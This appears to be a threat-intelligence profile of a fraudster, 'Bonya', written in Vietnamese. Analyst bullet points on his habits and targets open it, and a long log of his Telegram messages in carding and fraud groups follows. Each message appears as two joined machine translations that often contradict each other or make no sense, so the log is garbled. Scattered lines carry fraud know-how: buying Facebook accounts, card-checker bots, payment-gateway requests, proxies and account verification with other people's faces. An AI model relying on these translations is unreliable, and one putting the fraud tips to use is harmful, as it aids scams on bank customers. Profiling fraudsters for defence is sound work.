  • Sơ suất trong hoạt động — 261 tin nhắn được gửi trong các nhóm công khai bằng một tài khoản duy nhất. Việc sử dụng nhiều biệt danh (PapaZakonVor → Boa → Bonya) cho thấy người này nhận thức được tầm quan trọng của OPSEC nhưng lại không tuân thủ các nguyên tắc này
  • Tư duy trong tuyển dụng — tích cực mời mọi người “làm việc tại trung tâm chăm sóc khách hàng của mình” và bán kiến thức về vận hành để kiếm tiền
  • Sự thờ ơ đối với nạn nhân — bàn luận về các mục tiêu ở Ukraine, châu Âu, Israel và Mỹ với thái độ khách quan như nhau. Địa lý chỉ là một biến số trong phương trình lừa đảo
  • Các vấn đề về lòng tin — đã bị chính người chuyển tiền của mình phản bội vì ₴60K. Điều này thật trớ trêu, phản ánh chính sự thiếu tin tưởng mà anh ta gieo rắc vào các nạn nhân của mình
  • Do mở rộng thúc đẩy — mới đây nhất là vào tháng 3 năm 2026, đang tích cực tìm kiếm các thị trường ngân hàng mới (Israel), cho thấy vụ lừa đảo qua email nhắm vào Ukraine chỉ là một trong số nhiều hoạt động đang diễn ra song song
Bonya: Nhật ký tin nhắn đầy đủ (253 tin nhắn trong 12 nhóm)
Bonya (@BoaCC159) — Lịch sử tin nhắn đã dịch đầy đủ
-- Phoenix Solution (16 tin nhắn) --
B
Bonya2026-03-17 14:22
Có ai ở đây từng làm việc với các ngân hàng ở Israel không?Có ai ở đây từng làm việc với các ngân hàng của Israel không?
B
Bonya2026-03-17 14:22
cũng đang làm việc một cách lặng lẽ.chúng tôi cũng làm việc một cách lặng lẽ
B
Bonya2026-03-17 14:17
Mọi chuyện thế nào rồi?Bạn khỏe không?
B
Bonya2026-03-17 14:17
Xin chào mọi ngườiXin chào mọi người
B
Bonya2026-03-15 19:02
À, giờ thì hầu như mọi thứ đã được khắc phục rồi.À, nói chung thì mọi thứ đã ổn thỏa rồi
B
Bonya2026-03-15 19:02
À, cũng hơi phiền phức một chútThôi thì cũng gây ra chút rắc rối thôi mà
B
Bonya2026-03-15 19:01
Ừ, tớ cũng đã làm rất nhiều việc thầm lặng, thật là một mớ hỗn độn.Ừ, làm việc lặng lẽ thế này cũng chán chết rồi
B
Bonya2026-03-15 19:00
Ngày nghỉ của bạn thế nào?Cuối tuần vừa qua diễn ra như thế nào?
B
Bonya2026-03-15 19:00
Tất cả các bạn.Dành cho tất cả mọi người
B
Bonya2026-03-14 14:29
Giờ thì anh ta không còn là một người vô danh nữa, vì ai cũng biết đó chính là Marik.Anh ta cũng chẳng còn ẩn danh nữa, vì ai cũng biết anh ta là ai rồi mà
B
Bonya2026-03-14 14:24
Tái sinhTái sinh
B
Bonya2026-03-14 14:24
Ahahahahahahahahahahahahahahahahahahahahahahahahah.Aha ha ha ha ha ha ha ha ha ha ha ha
B
Bonya2026-03-14 14:23
Tôi đã rất buồn khi thấy phòng chat không còn nữa.Tôi đã thực sự thất vọng khi thấy phòng chat biến mất
B
Bonya2026-03-14 14:22
Tớ tưởng mình sẽ không bao giờ tìm thấy cậu.Tôi đã tưởng là không tìm thấy các bạn nữa rồi
B
Bonya2026-03-14 14:22
KooКу
B
Bonya2026-03-14 14:22
Mẹ kiếpЕба
-- 👨‍⚕️ FB-DOC — Cuộc trò chuyện về phân xử lưu lượng truy cập (21 tin nhắn) --
B
Bonya2026-03-15 07:23
@fbdoc21@fbdoc21
B
Bonya2026-03-15 07:20
Dùng “cái ấy” của mình đấm vào trán đi.Dùng “cái ấy” của mình gõ lên trán
B
Bonya2026-03-06 15:18
Giống như số 5 trên màn hình 2,5😂.Giống hệt như hình chụp màn hình số 2,5 vậy 😂
B
Bonya2026-02-19 17:05
Gửi đến tất cả các bạn.Chúc các bạn mọi điều tốt lành
B
Bonya2026-02-19 17:04
Nếu cậu mở một giao dịch, tớ sẽ cười đấy.Nếu bạn mở giao dịch, tớ sẽ cười sặc sụa
B
Bonya2026-02-19 17:04
châu lục?kiểu lục địa?
B
Bonya2026-02-19 17:04
Vậy là cô ấy đây rồi.Thế là cô ấy đồng ý rồi
B
Bonya2026-02-19 17:01
Vì vậy, hãy luôn kiểm tra kỹ khi bạn hỏi về người bảo lãnh.Vì vậy, hãy luôn kiểm tra điều này mỗi khi hỏi về người bảo lãnh
B
Bonya2026-02-19 17:00
Anh ta hỏi về người bảo lãnh rồi lập tức biến mất.Anh ta vừa hỏi về người bảo lãnh thì biến mất ngay lập tức
B
Bonya2026-02-19 17:00
ay carinaÀ, Karina
B
Bonya2026-02-19 16:59
Vậy là bạn định tìm người bảo lãnh à?Thế cậu có định chọn người bảo lãnh không?
B
Bonya2026-02-19 16:57
Tôi cũng sẽ không đồng ý cho vay dựa trên tỷ lệ phần trăm chi tiêu nếu không có người bảo lãnh.Tôi cũng sẽ không nạp tiền theo tỷ lệ phần trăm trên tổng chi tiêu nếu không có người bảo lãnh
B
Bonya2026-02-19 16:57
tôi à?tôi à?
B
Bonya2026-02-19 16:57
Thôi thì, cô ấy đã gửi mấy ảnh chụp màn hình, còn anh thì chẳng cho tớ cái gì cả.Thế là cô ấy đã đăng mấy cái ảnh chụp màn hình, còn cậu thì chẳng đưa gì cả
B
Bonya2026-02-19 16:56
hãy xem những ảnh chụp màn hình mà cô ấy đã đăng lênHãy xem mấy ảnh chụp màn hình mà cô ấy đã gửi đi
B
Bonya2026-02-19 16:55
Anh ấy không đề cập đến người bảo lãnh sao?Anh ấy không viết gì về người bảo lãnh sao?
B
Bonya2026-02-19 16:54
Cậu đúng là một kẻ lập dị😂Mày bị điên à 😂
B
Bonya2026-02-19 16:53
Bạn đã yêu cầu có người bảo lãnh.Bạn đã nhờ người bảo lãnh
B
Bonya2026-02-19 16:52
nơiở đâu
B
Bonya2026-02-17 14:37
Ai sẽ cung cấp cho cửa hàng mấy chiếc xe tốt đây?Ai sẽ mở cửa hàng bán xe, với những chiếc xe tốt?
B
Bonya2026-02-17 12:10
Bất cứ nơi nào bạn thích, họ cũng sẽ làm giúp bạn😂Ở bất cứ đâu, miễn là thấy thích là họ sẽ làm cho bạn thôi😂
-- EMPIRE CHAT (24 tin nhắn) --
B
Bonya2026-03-14 13:17
Tớ đã biết cách rồi, nhưng tớ lười giải thích quá.Tôi đã hiểu rồi nhưng lười giải thích
B
Bonya2026-03-14 13:17
Dù thế nào đi nữa, hắn cũng sẽ cho mày một trận tơi bời.Dù trong bất kỳ tình huống nào đi chăng nữa, hắn cũng sẽ lừa gạt cậu
B
Bonya2026-03-12 17:16
Theo những cách khác nhau.Tùy từng trường hợp
B
Bonya2026-03-12 17:08
+ Hơn nữa, hiện tại đang có rất nhiều cơn bão.+ Hiện tại có những cơn bão mạnh
B
Bonya2026-03-12 17:07
Nếu nó màu đen, tớ cá là...Nếu là màu đen thì tôi đã cá cược rồi
B
Bonya2026-03-12 17:07
Tùy thuộc vào loại ưu đãi là gì; nếu là màu trắng thì có.Tùy thuộc vào loại ưu đãi nào; nếu là ưu đãi màu trắng thì có.
B
Bonya2026-03-12 17:06
Đó là hai thế giới hoàn toàn khác nhauHai thế giới khác nhau chính là
B
Bonya2026-03-12 17:06
Không có cái nào khác cảHoàn toàn không có cái nào khác
B
Bonya2026-03-12 17:06
Bạn có thể thiết lập sao cho chỉ các máy tính cá nhânỞ đó, bạn có thể thiết lập để chỉ hiển thị các máy tính để bàn
B
Bonya2026-03-12 17:05
Google không hiệu quả như tôi tưởng.Theo tôi, Google không hiệu quả như vậy
B
Bonya2026-03-12 17:05
À, tớ không dùng Google, tớ chỉ dùng Facebook thôi.À, tôi không dùng Google, chỉ dùng Facebook thôi.
B
Bonya2026-03-12 17:05
Miễn là bạn phải tìm ra một nốt liên kết trong suốt quá trình đó.Với điều kiện là vẫn còn phải gom tất cả những thứ vớ vẩn này lại thành một bó
B
Bonya2026-03-12 17:04
Những lời từ chối, những lời đồng ý bay vút đi như những cơn bão. Vân vân.Các bản bị loại, các tài khoản bị khóa chỉ vì những cơn bão như thế này. Và vân vân
B
Bonya2026-03-12 17:04
Không phải lúc nào cũng toàn hoa đâu, anh bạn ạ.Không phải chỉ có thế đâu anh bạn ơi, còn nhiều điều thú vị nữa đấy
B
Bonya2026-03-12 17:03
Tất cả các hợp đồng mua bán thường xuyên trên thị trường giao ngay với mức độ tin cậy cao hơnTất cả đều là pin thông thường với độ tin cậy cao nhất
B
Bonya2026-03-12 17:03
Hiện tại trên thị trường không có công ty nào đáng tin cậy cả.Hiện tại trên thị trường không có công ty môi giới nào tốt cả
B
Bonya2026-03-12 17:02
Gây căng thẳng hơn là đáng sợCó lẽ là căng thẳng hơn là sợ hãi
B
Bonya2026-03-12 17:02
Tiền điện tử, bản năng cờ bạc và bản sắc da đen đều trào dângTiền điện tử, cờ bạc trực tuyến và nội dung đen tối đều tràn lan
B
Bonya2026-03-12 17:01
Việc cuối cùng mà thành phố đã làm là xâm nhập vào 2d.Điều cuối cùng xuất hiện trong trò chơi 2D này thật tuyệt vời
B
Bonya2026-03-12 17:01
Nếu bạn tìm kiếm tôi dựa trên tiêu chí cá nhân hoặc ngân sách, thì những dự án leo núi 2D cần 1-2k zeles để chi cho các bài kiểm tra, và số tiền đó sẽ không kéo dài được lâu.Nếu muốn tìm xem cái nào chạy được, dù là dùng tiền túi hay từ ngân sách, thì để tìm ra cái nào chạy được trên 2D, bạn phải chi 1-2k zel cho các bài kiểm tra, và dù sao thì nó cũng chẳng tồn tại được lâu đâu.
B
Bonya2026-03-12 17:00
Tôi đang rótTôi đang rót
B
Bonya2026-03-12 16:59
(Vì không có yêu cầu nào như vậy đối với các đề nghị dành cho người da trắng)Bởi vì không có những yêu cầu như vậy đối với các đề nghị trắng)
B
Bonya2026-02-14 14:33
Ai có khoản vay Dreiner đang trong giai đoạn kiểm tra AML? Chỉ khi có người bảo lãnh hoặc đã sẵn sàng về phía người bảo lãnhAi có bộ kiểm tra AML không? Chỉ loại có kho dự trữ hay loại đã được kiểm định sẵn?
B
Bonya2026-01-11 03:14
Có một người trong nhóm Facebook, và còn có một người bạn nữa. Cần mua lại tài khoản Facebook, giá có thể thương lượng.Có người đã đăng trên Facebook rồi, và có cả những lời chửi thề. Cần nạp tiền vào Facebook, giá cả chúng ta sẽ thương lượng sau.
-- SТYХ СНAT [ STYXMARKET.ST ] (2 tin nhắn) --
B
Bonya2025-12-05 12:04
Cần hóa đơn, Payzaty, Cashfree, Eportal 3dsCần hóa đơn, Payzaty, Cashfree, Eportal 3ds
B
Bonya2025-11-22 11:14
Có người bảo lãnh cho cuộc trò chuyện không?Ở đây có ai phụ trách chat không?
-- Phòng chat Giải quyết tranh chấp lưu lượng truy cập (2 tin nhắn) --
B
Bonya2025-11-24 14:50
100%100%
B
Bonya2025-11-24 14:49
Kênh Tg sẽ bị chiếm quyền điều khiểnKênh TG sẽ bị đánh cắp
-- Công cụ kiểm tra Raven CC (2 tin nhắn) --
B
Bonya2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Bonya2025-11-21 21:18
/check/check
-- Trình duyệt Vision Trò chuyện (2 tin nhắn) --
B
Bonya2025-11-14 16:47
Cảm ơn.Cảm ơn
B
Bonya2025-11-14 16:47
"vicen werk" trong tiếng Nga là gì?vi?en work trong ru?
-- 💬ONE|Trò chuyện (86 tin nhắn) --
B
Bonya2025-03-05 17:06
Các bạn ơi, chỉ cho tớ một cửa hàng nào đó để tớ có thể mua miếng lót nhé.Các anh ơi, chỉ cho tớ chỗ nào có thể tìm được các sân chơi nhé
B
Bonya2025-03-05 16:22
thậm chí còn chẳng thể tỏ ra cuồng nhiệt đượcThậm chí còn không thể làm móng tay được
B
Bonya2025-03-05 16:22
tương tự như vậycũng vậy
B
Bonya2025-03-05 16:21
Trả lời tôi đi, cái quái gì thế, liệu người hướng dẫn có phòng chat với các học viên hay không.Chết tiệt, ai đó trả lời giúp tớ đi, thầy hướng dẫn có mở nhóm chat với học sinh hay không vậy?
B
Bonya2025-03-05 16:10
và ai là tsVậy ai là người đó?
B
Bonya2025-03-05 15:44
Việc này không khó, nhưng ở đây không có tài liệu hướng dẫn đầy đủ, chỉ có các hướng dẫn viên thôi.Ở đó không khó lắm, nhưng ở đây không có tài liệu hướng dẫn đầy đủ, chỉ có các huấn luyện viên thôi.
B
Bonya2025-03-05 15:42
Nói chung thì đúng vậy, nếu bạn biết cách.Thực ra thì đúng vậy, nếu bạn biết cách
B
Bonya2025-03-05 15:42
nửa ngàynửa ngày
B
Bonya2025-03-05 15:42
Cuộc gọi đầu tiên có 600 người, anh ấy không trả lời.Với 600 người đầu tiên, anh ấy không trả lời
B
Bonya2025-03-05 15:41
Nếu bạn có đủ tiền, hãy mua cái có giá 200 đô la.Nếu có bà già nào, thì hãy chọn người nào đòi 200$ ấy
B
Bonya2025-03-05 13:55
Ai là người giảng dạy rất xuất sắc trong phòng trò chuyện dành cho sinh viên vậy?Có ai đang theo học tại trường khoa học viễn tưởng đó không? Ở đó có phòng trò chuyện dành cho học sinh không?
B
Bonya2025-03-03 15:10
SécHóa đơn
B
Bonya2025-03-03 15:10
Chiếc máy hút bụiNgười đang hút bụi
B
Bonya2025-03-03 15:10
Hiểu rồi
B
Bonya2025-03-03 15:10
Chắc hẳn cũng có mấy con điếm dùng phần mềm.Thế thì chắc chắn là có phần mềm lừa đảo rồi
B
Bonya2025-03-03 15:09
Đó làĐã từng
B
Bonya2025-03-03 15:09
Ồ, thế thì tốt quá.Ồ, cái này hay đấy
B
Bonya2025-03-03 15:09
Trinuriuet ruruTrinuriuet ruru
B
Bonya2025-03-03 15:09
Và chúng đang được thu thậpVà người ta thu thập chúng
B
Bonya2025-03-03 15:09
Tip chỉ ngồi đó mà vò nát những chiếc giấy góiThằng đó đang ngồi lượn lờ, làm trò vớ vẩn
B
Bonya2025-03-03 15:04
Tại sao lại có biển số xe của Ukraine?Thế tại sao lại dùng số điện thoại Ukraine?
B
Bonya2025-03-03 15:03
Tôi đã nói "kc."Tôi đã nói với KC
B
Bonya2025-03-03 15:03
Tôi hiểu rồi.Tôi đã hiểu
B
Bonya2025-03-03 15:03
Nếu chuyện này phức tạp, cậu sẽ mất chiếc mũ nồi của mình đấy.Nếu dùng “eslm ru” thì ở đây nồi của cậu sẽ bị văng ra mất đấy
B
Bonya2025-03-03 15:03
Chết tiệt, để so xem cậu sẽ chạy bài tập FB Rekul bao nhiêu lần trong lúc tớ đang lấy hỗn hợp roux ra nhé.Thôi nào, so sánh xem cậu khởi động lại Facebook bao nhiêu lần trong khi tớ quay video đây
B
Bonya2025-03-03 15:02
Dành cho người hộ tốngDịch vụ hộ tống
B
Bonya2025-03-03 15:02
Những gã này có kiểu phát triển lố bịch đến mức đủ để biến thành một thằng khốn nạn.Với mấy thằng này, việc phát triển chỉ để tạo ra mấy trò vớ vẩn thôi
B
Bonya2025-03-03 15:02
Chết tiệt, toàn là mấy thằng “woker” ở đây.Chúa ơi, toàn mấy thằng làm thuê ở đây thôi
B
Bonya2025-03-03 15:02
Những loại bàn nàoCó những loại bàn nào?
B
Bonya2025-03-03 15:01
Nếu giọng hát của bạn hay, bạn sẽ giành được vị trí thứ 30.Nếu giọng hát của bạn hay, bạn sẽ có được 30 người
B
Bonya2025-03-03 15:01
Còn nhiều tiền hơn nữaỞ đó có nhiều tiền hơn
B
Bonya2025-03-03 15:01
Hãy đến làm việc tại công ty của tôi.Hãy đến trung tâm văn hóa làm việc cùng tôi
B
Bonya2025-03-03 15:00
KhôngKhông
B
Bonya2025-03-03 14:59
PlategamPlategam
B
Bonya2025-03-03 14:59
+ Tôi không biết cách xem lại trận đấu+ Tôi không hiểu gì về các bài hát
B
Bonya2025-03-03 14:59
Rất khó để tìm được những giọt nước tốt.Cũng khó mà tìm được những món đồ rơi tốt
B
Bonya2025-03-03 14:58
Hay là có phiên bản 1.0?Hoặc phiên bản 1.0 đã có
B
Bonya2025-03-03 14:58
Ở đây chỉ có 2,0 phish thôi.Và ở đây là các chip có dòng điện 2,0
B
Bonya2025-03-03 14:58
Hay nói cách khác, 1.0 còn hơn 2.0.Thôi thì 1.0 vẫn tốt hơn 2.0
B
Bonya2025-03-03 14:57
Cùng với những con voi ma mútVới những con voi ma mút
B
Bonya2025-03-03 14:57
Phiên bản 2.0 không thể hoạt động nếu chỉ ngồi không và lêu lổng.2.0 – Ngồi đây lảm nhảm thế này thì chả được gì cả
B
Bonya2025-03-03 14:57
Tôi thiên về lĩnh vực giao thông hơn.Không phải tôi nữa, xét về lưu lượng truy cập
B
Bonya2025-03-03 14:57
Đây là tác phẩm “X’s” của RooĐây là các ký hiệu X trên bàn tay
B
Bonya2025-03-03 14:56
Nhưng đây không phải là các nhóm quảng cáoNhưng đây không phải là các đội quảng cáo
B
Bonya2025-03-03 14:56
Họ có làm thế. Tôi biết một người như vậy.(Có người quen làm việc đó)
B
Bonya2025-03-03 14:56
Tất nhiên là không, nếu bạn biết cách kiếm được 400-500 mỗi ngày.Thôi nào, nếu biết cách thì mỗi người có thể kiếm được khoảng 400-500 mỗi ngày đấy
B
Bonya2025-03-03 14:55
Thế thì có gì to tát đâu?)Thôi thì, sao lại quên mất cái này nhỉ )
B
Bonya2025-03-03 14:55
Có một liên kết đến tài liệu hướng dẫnỞ đó có liên kết đến tài liệu hướng dẫn
B
Bonya2025-03-03 14:54
Đây chính là những bàn tay như thế nàyNhững bàn tay như thế này sẽ làm nên chuyện
B
Bonya2025-03-03 14:54
Chảy nước dãi và liếc mắt táo bạo chỉ để được một cái bắt tay.Để bắt đầu làm chuyện ấy, có thể chảy nước miếng và mở to mắt nhìn sang hai bên
B
Bonya2025-03-03 14:54
Thế thì vấn đề là gì? Cũng chỉ là công việc đó thôi mà.Thế thì vấn đề ở đây là gì chứ? Cái này cũng giống như vậy mà.
B
Bonya2025-03-03 14:53
Sẽ mất một tháng để đến được khu vực đóSẽ đưa vào khu vực đó trong vòng một tháng
B
Bonya2025-03-03 14:53
Và chẳng còn đường nào để đi cả. Nếu cậu có não, cậu sẽ tự hiểu ra thôi. Còn nếu không, cậu phải cút khỏi đây ngay.Thôi thì cũng chẳng có gì để làm ở đây cả. Nếu có đầu óc thì tự hiểu ra, còn không thì cũng chẳng biết làm gì ở đây.
B
Bonya2025-03-03 14:53
Bạn muốn gì?Cậu muốn gì vậy?
B
Bonya2025-03-03 14:53
Quảng cáoQuảng cáo
B
Bonya2025-03-03 14:52
Tôi đã ở đây được 2 ngày rồi mà phiên bản 2.0 chẳng có gì thú vị cả. Tôi tưởng nó hay ho cơ mà.Tôi mới ở đây được 2 ngày và phiên bản 2.0 thì chẳng có gì thú vị cả, tôi cứ tưởng nó sẽ hay ho lắm cơ
B
Bonya2025-03-03 14:52
Và hãy thưởng thức một miếng thịt voi ma mútVà nuôi một con voi ma mút
B
Bonya2025-03-03 14:52
Hãy dùng đầu óc để suy nghĩ xem nên nói gì.Tôi phải suy nghĩ xem nên trả lời thế nào
B
Bonya2025-03-03 14:52
Không có bí mật nào cảỞ đây chẳng có bí mật nào cả
B
Bonya2025-03-03 14:52
Anh ấy sẽ tặng bạn thứ gì nhỉ?Nó sẽ mang lại cho các bạn điều gì
B
Bonya2025-03-03 14:52
Thế thì có ý nghĩa gì đâu, nếu cuốn hướng dẫn sử dụng cũng chứa toàn những thông tin đó.Thế thì có ý nghĩa gì chứ, nếu trong sách hướng dẫn đã có đầy đủ thông tin đó rồi
B
Bonya2025-03-03 14:51
Anh ấy sẽ có thời gian để trả lời tất cả các câu hỏi của các bạnLàm sao tớ có thể trả lời hết mọi người được chứ
B
Bonya2025-03-03 14:51
Thật là một buổi tập luyện.Phương pháp nào?
B
Bonya2025-03-03 14:51
Anh ta có 100 người ở trong đó.Chà, ở đó mỗi chỗ có khoảng 100 người
B
Bonya2025-03-03 14:51
Sao anh không đưa tôi ít tiền đi, rồi tôi sẽ đưa anh cuốn hướng dẫn sử dụng của chiếc kẹp ấy.Có thể gửi cho tớ ít tiền không? Tớ sẽ gửi cho các bạn bản hướng dẫn từ bài ôn tập
B
Bonya2025-03-03 14:50
Trong quá trình sửa chữaTrong phần củng cố
B
Bonya2025-03-03 14:50
Bạn không cần phải có một cuốn sách hướng dẫn để dạy bạn mọi thứ.Thôi kệ các người đi, ai cũng có sách hướng dẫn rồi mà
B
Bonya2025-03-03 14:50
Phiên bản 2.0 là như vậy.2.0: Đã từng như thế nào thì bây giờ vẫn như thế
B
Bonya2025-03-03 14:50
Chuyện quái quỷ gì thế này?Ồ, bài tập này khó quá nhỉ
B
Bonya2025-03-03 14:48
Chính bạn đã bắt đầu chuyện này à?Cậu đã tự mình bắt đầu chưa?
B
Bonya2025-03-03 14:48
Không phải "coo-coo"Không thể nào làm việc được
B
Bonya2025-03-03 14:48
Có một lệnh ám sát nhắm vào lkTheo lk thì có vụ giết người
B
Bonya2025-03-03 14:48
Chuyện gì đang xảy ra vậy?Các bài tập về LK
B
Bonya2025-03-03 14:48
Trong số những thứ này, các anh là cái nào, như các anh đã nói đấy.Mấy thằng này là ai vậy, mẹ kiếp, nói thế nào nhỉ
B
Bonya2025-03-03 14:47
Tôi không hiểu ý bạn muốn nói gì ở đây.Ở chỗ này tớ không hiểu cậu nói gì
B
Bonya2025-03-03 14:46
Nếu họ đã đăng nhập rồi thì tốt quá.Nếu vào trang cá nhân thì ZBS
B
Bonya2025-03-03 14:46
Vậy, họ có đăng nhập không?Thế mọi người có vào trang cá nhân không?
B
Bonya2025-03-03 14:45
Tôi không biết họ quay những cảnh đó như thế nào.Chẳng biết họ quay những cảnh đó thế nào
B
Bonya2025-03-03 14:45
Những chú chó nên bỏ qua?Có ai muốn thanh lý không?
B
Bonya2025-03-03 14:45
Mẹ kiếp, có cái nút bấm chết tiệt này rồiThôi kệ, còn phải đi dọn dẹp nữa chứ
B
Bonya2025-03-03 14:42
Tự tay tôi đang rót nóChính tôi đang rót
B
Bonya2025-03-03 14:42
Tao chợt nhận ra là chuyện này chẳng phải để đùa đâu.Mình đã hiểu rồi, cái đó không phải chuyện vớ vẩn đâu
B
Bonya2025-03-03 14:41
Anh ơi, ở đây họ chẳng bán gì bằng thẻ cả, đây là thẻ chỉ dùng để rút tiền lương thôi.Anh ơi, ở đây không bán gì bằng thẻ cả, ở đây chỉ dùng thẻ để thanh toán thôi
B
Bonya2025-03-03 14:41
Tôi hiểu rồi, chẳng có chỗ nào để đổ cảTôi hiểu rồi, ở đây không có chỗ nào để đổ nó cả
B
Bonya2025-03-03 14:40
Chắc là phiên bản Regular 2.0.Các phiên bản 2.0 thông thường kiểu như
B
Bonya2025-03-03 14:40
Cũng không phải là họ đang gây ùn tắc giao thông đâuVậy là ở đây không có lưu lượng truy cập
-- Fbstore - Diễn đàn dành cho các chuyên gia web thành công! (23 tin nhắn) --
B
Bonya2025-02-26 07:51
Thôi thì, cứ làm cái quái gì mà mày muốn đi.Thôi thì cứ làm đi, kệ mặt ai đó
B
Bonya2025-02-26 07:50
Một cậu học sinh 200₽.Thôi thì cho cô học sinh 200₽ đi
B
Bonya2025-02-26 07:50
Nó sẽ hoạt độngCũng được
B
Bonya2025-02-26 07:50
Bạn sẽ gặp một người vô gia cư trên đường phố.Ra đường bắt mấy gã vô gia cư rồi đi đi
B
Bonya2025-02-26 07:50
Vậy nên ai cũng tin vào khuôn mặt của chính mình, bất kể đó là khuôn mặt của ai đi chăng nữa.Thế là ai cũng xác minh bằng ảnh của mình, ai quan tâm chứ
B
Bonya2025-02-26 07:50
Trúng ngay mặt.Trên khuôn mặt của mình
B
Bonya2025-02-26 07:49
Nhưng thực tế là, dù sao đi nữa, tớ đã làm điều đó 10 lần rồi.Nhưng thực ra, tôi đã xác minh được khoảng 10 tài khoản rồi
B
Bonya2025-02-26 07:49
Vậy thì nói đi, cậu chỉ đang nói nhảm thôi mà.Vậy thì nói đi, mày đang nói xấu ai thế?
B
Bonya2025-02-26 07:49
Bạn có thểCó thể
B
Bonya2025-02-26 07:49
Trúng ngay mặt.Trên khuôn mặt của mình
B
Bonya2025-02-16 20:26
thay vì làm hỏng chúng bằng mấy cái khóa huấn luyện vớ vẩn rồi bắt chúng phải đối phó với lưu lượng giao thông.chứ không phải kiểu lừa đảo bằng mấy khóa học vớ vẩn rồi lợi dụng họ để kiếm tiền
B
Bonya2025-02-16 20:25
như bình thường, UBT, TT, TT, YouTube, v.v.các kênh YouTube thông thường, UBT, TT, v.v.
B
Bonya2025-02-15 17:31
XzХз
B
Bonya2025-02-15 17:31
Dưới chiêu bài huấn luyệnDưới danh nghĩa đào tạo
B
Bonya2025-02-15 17:31
Hướng về các con kênhTrên các kênh
B
Bonya2025-02-15 17:31
Chỉ là do lượng người qua lại thôi.Chỉ là lượng truy cập từ mọi người đang tăng lên thôi
B
Bonya2025-02-15 17:31
Vậy nên anh chàng đó bảo mọi người đăng ký theo dõi tất cả các kênh của anh ấyThế là anh chàng đó bảo mọi người đăng ký theo dõi tất cả các kênh của anh ta
B
Bonya2025-02-15 16:36
Bạn không cần phải viếtHui Nyu đề nghị các bạn không cần phải viết
B
Bonya2025-02-06 15:11
Nếu bạn không nắm được những kiến thức cơ bản về cách rót, bạn sẽ...Nếu bạn không biết những kiến thức cơ bản như cách đúc thì sẽ ra sao
B
Bonya2025-02-06 15:11
Có một nút để thay đổi aipi, bạn ít nhất cũng nên tìm kiếm trên Google xem sao.Nhấn vào nút đó là địa chỉ IP sẽ thay đổi, cậu cứ thử tìm trên Google xem
B
Bonya2025-02-06 15:10
🤨🤨
B
Bonya2025-02-06 15:09
Bạn có thể thay đổi hình aipi trong đó bằng cách xoay nó.Ở đó, bạn có thể thay đổi thứ tự xoay của các IP
B
Bonya2025-02-06 15:09
Tại sao lại là số 1? Bởi vì đó cũng là điện thoại di động.Tại sao lại là 1, đó chính là thiết bị di động mà
-- CryptoGrab - Phòng chat hỗ trợ lẫn nhau (10 tin nhắn) --
B
Bonya2025-02-06 15:31
Chuyện không đơn giản như vậy đâuChuyện không đơn giản như vậy đâu
B
Bonya2025-02-06 15:31
Dễ thôi.Izi
B
Bonya2025-01-23 20:30
Không có một ví dụ nàoKhông chỉ có một ví dụ
B
Bonya2025-01-23 20:30
Việc tôi không thể tìm thấy bất kỳ quảng cáo nào về xét nghiệm AML trên Internet thực sự chẳng có gì đáng cười cả.Thật là lạ là tớ chẳng tìm thấy bất kỳ quảng cáo nào về các bài kiểm tra AML trên mạng cả
B
Bonya2025-01-23 17:20
Trên màn hình AML hoàn toàn không hiển thị gì cả.Trên AML chẳng có gì cả
B
Bonya2025-01-23 17:20
Tôi đã thử dùng AML trên Facebook để tìm kiếm thông tin về Mỹ, và thấy rằng ngay cả những gói dữ liệu cũ cũng rất hữu ích, dù chúng không có trên mạngTôi đã thử tìm kiếm thông tin về AML trên Facebook nhưng cũng không tìm thấy bất kỳ nguồn tin đáng tin cậy nào, kể cả những nguồn cũ, trên mạng.
B
Bonya2025-01-23 17:19
Vậy, anh đang dự định đưa ra đề nghị như thế nào?Thế còn nói chung thì cậu dự định sẽ đưa ra đề nghị nào vậy?
B
Bonya2025-01-23 17:16
Bạn có dùng AML không?Còn cậu thì có chơi AML không?
B
Bonya2025-01-21 20:38
Bất kỳ ai đang phát trực tiếp trên Facebook đều muốn làm rõ một vài thắc mắcCó ai đang quản trị trang Facebook không? Tôi muốn hỏi rõ thêm một vài câu hỏi
B
Bonya2025-01-20 11:08
Có ai biết ví dụ nào về creos cho bệnh AML không?Có ai có ví dụ về quảng cáo sáng tạo cho AML không?
-- Rolex | phòng chat chung (28 tin nhắn) --
B
Bonya2024-09-11 15:29
Người Litva đang thi đấu ở sân nào?Và Litva đang bị đánh tơi tả trên sân nào vậy?
B
Bonya2024-09-11 15:21
Mày đang đùa với con ốc à?Cậu đang đùa à?
B
Bonya2024-09-11 15:20
Chỉ là các trang web này quá khắt khe và phải mất quá nhiều thời gian để loay hoay với chúngChỉ là các nền tảng này hạn chế công việc quá nhiều và gây ra biết bao rắc rối
B
Bonya2024-09-11 15:19
Tớ đã nghĩ ra một ý tưởng rồi. Nếu họ làm được, chắc chắn sẽ tuyệt vời lắm đây.Tớ đã nghĩ ra một chủ đề và viết thử xem sao; nếu họ thực hiện được thì sẽ tuyệt vời lắm đấy
B
Bonya2024-09-11 15:19
Tôi không thấy có nhiều nhật ký trên trang trại này.Tôi không thấy có logo nào trên chiếc Finke cả
B
Bonya2024-09-11 15:19
Các địa điểm biểu diễn đó đang gặp phải mấy chuyện rắc rối kinh khủng.Thôi nào, mấy gã đó đang gây ra một mớ hỗn độn với tất cả các sân thi đấu
B
Bonya2024-09-11 15:16
Đó chính là điều tôi muốn nói, giống như một chiếc Ford trên một chiếc Ford vậy.Thế nên tớ mới nói, lừa đảo chồng chất lừa đảo
B
Bonya2024-09-11 15:15
Tôi không hiểu bây giờ tình hình đã tốt hơn ở điểm nào, tôi thấy là mọi người ở Phần Lan đều không đi làm.Tôi thực sự không hiểu tại sao bây giờ lại chạy tốt hơn, tôi thấy là ở mọi người đều có vấn đề gì đó với tài khoản ngân hàng không hoạt động được
B
Bonya2024-09-11 15:08
À, cơ hội là 50/50 nếu bạn may mắn với các máy chủ proxy.Chà, 50/50 thôi, nếu may mắn với proxy thì...
B
Bonya2024-09-11 15:07
Nhưng để bạn hiểu rõ, hiện nay, với các proxy cao cấp, ngay cả trên Viber, khi bạn đăng nhập, hệ thống sẽ gặp sự cố.Nhưng để anh hiểu nhé, bây giờ dùng các proxy cao cấp thì ngay cả khi vào Viber cũng bị phát hiện là giả mạo
B
Bonya2024-09-11 15:07
À, tôi thì không rõ về các lon của EU.À, tôi chẳng rành gì về các ngân hàng EU cả
B
Bonya2024-09-11 15:07
Trong lkTrong lk
B
Bonya2024-09-11 15:06
